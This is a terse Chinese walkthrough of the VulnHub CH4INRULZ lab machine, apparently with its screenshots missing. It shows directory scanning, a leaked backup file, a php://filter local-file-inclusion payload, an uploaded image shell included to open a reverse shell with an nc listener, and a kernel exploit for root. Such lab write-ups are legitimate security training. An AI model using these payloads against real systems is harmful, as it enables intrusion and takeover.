vulnhub-CH4INRULZ

信息收集

 

 

./dirsearch.py --random-agents -u ‘http://192.168.17.142:8011/’ -e *

扫描目录

 vulnhub-CH4INRULZ

 

 

Bak泄露

 vulnhub-CH4INRULZ

 

 

John frank

 vulnhub-CH4INRULZ

 

 

登陆到development

 vulnhub-CH4INRULZ

 

 

Uploader可以上传

 

先看8081

 vulnhub-CH4INRULZ

 

 

Api

 vulnhub-CH4INRULZ

 

 

 vulnhub-CH4INRULZ

 

 

 vulnhub-CH4INRULZ

 

 

成功

可以包含出apache的一些服务

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

 vulnhub-CH4INRULZ

 

 

FRANKuploads

Nc -lvp 4235

file=/var/www/development/uploader/FRANKuploads/shell.jpg包含可以反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

 vulnhub-CH4INRULZ

 

 

Uname-a

 

获取shell

 vulnhub-CH4INRULZ

 

 

 vulnhub-CH4INRULZ

 

 

提权

获取编号15285

 vulnhub-CH4INRULZ

 

 

 vulnhub-CH4INRULZ

 

 

 vulnhub-CH4INRULZ

 

 

获得flag

 vulnhub-CH4INRULZ

 

上一篇:vulnhub dc-9靶机通关


下一篇:[vulnhub] callme